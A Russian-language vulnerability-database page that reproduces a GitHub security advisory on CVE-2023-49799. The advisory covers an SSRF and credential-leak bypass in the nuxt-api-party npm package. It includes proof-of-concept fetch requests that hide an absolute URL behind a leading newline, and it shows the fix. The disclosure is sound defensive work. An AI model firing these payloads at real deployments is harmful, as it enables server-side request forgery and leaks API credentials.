Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-3wfp-253j-5jxv

Опубликовано: 12 дек. 2023
Источник: github
Github: Прошло ревью
CVSS3: 7.5

Описание

SSRF & Credentials Leak

Summary

nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. A previous vulnerability allowed an attacker to change the baseURL of the request, potentially leading to credentials being leaked or SSRF.

This vulnerability is similar, and was caused by a recent change to the detection of absolute URLs, which is no longer sufficient to prevent SSRF.

Details

nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use a regular expression ^https?://.

This regular expression can be bypassed by an absolute URL with leading whitespace. For example \nhttps://whatever.com has a leading newline.

According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue." (source)

This means the final request will be normalized to https://whatever.com. We have bypassed the check and nuxt-api-party will send a request outside of the whitelist.

This could allow us to leak credentials or perform SSRF.

PoC

POC using Node.

await fetch("/api/__api_party/MyEndpoint", { method: "POST", body: JSON.stringify({ path: "\nhttps://google.com" }), headers: { "Content-Type": "application/json" } })

We can use __proto__ as a substitute for the endpoint if it is not known. This will not leak any credentials as all attributes on endpoint will be undefined.

await fetch("/api/__api_party/__proto__", { method: "POST", body: JSON.stringify({ path: "\nhttps://google.com" }), headers: { "Content-Type": "application/json" } })

Impact

Leak of sensitive API credentials. SSRF.

Fix

Revert to the previous method of detecting absolute URLs.

if (new URL(path, 'http://localhost').origin !== 'http://localhost') { // ... }

Ссылки

Пакеты

Наименование

nuxt-api-party

npm
Затронутые версииВерсия исправления

< 0.22.0

0.22.0

EPSS

Процентиль: 83%
0.01874
Низкий

7.5 High

CVSS3

CVE ID

CVE-2023-49799

Дефекты

CWE-918

Связанные уязвимости

nvd логотип

CVE-2023-49799

CVSS3: 7.5
nvd
около 2 лет назад

`nuxt-api-party` is an open source module to proxy API requests. nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use the regular expression `^https?://`, however this regular expression can be bypassed by an absolute URL with leading whitespace. For example `\nhttps://whatever.com` which has a leading newline. According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.". This means the final request will be normalized to `https://whatever.com` bypassing the check and nuxt-api-party will send a request outside of the whitelist. This could allow us to leak credentials or perform Server-Side Request Forgery (SSRF). This vulnerability has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should revert to the previou

EPSS

Процентиль: 83%
0.01874
Низкий

7.5 High

CVSS3

CVE ID

CVE-2023-49799

Дефекты

CWE-918